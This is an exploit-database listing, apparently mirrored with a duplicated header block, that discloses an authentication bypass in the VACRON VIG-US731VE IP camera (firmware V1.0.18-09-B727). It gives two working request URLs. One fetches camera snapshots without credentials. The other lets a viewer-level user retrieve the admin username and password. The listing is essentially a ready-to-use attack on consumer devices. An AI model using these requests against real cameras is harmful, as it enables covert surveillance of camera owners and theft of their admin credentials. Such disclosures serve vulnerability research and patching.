VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass
| EKU-ID: 46527 | CVE: | OSVDB-ID: |
| Author: Viktoras | Published: 2017-07-20 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 46527 | CVE: | OSVDB-ID: |
| Author: Viktoras | Published: 2017-07-20 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: IP Camera VACRON VIG-US731VE # Date: 2017-07-18 # Exploit Author: anonymous # Vendor Homepage: www.vacron.com # Version: V1.0.18-09-B727 1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg 2. allows "viewer" level user to fetch any camera setting, eg admin user and password: http://192.168.0.200/vb.htm?adminid&adminpwd there is newer firmware available from the vendor, but I haven't tested on that one.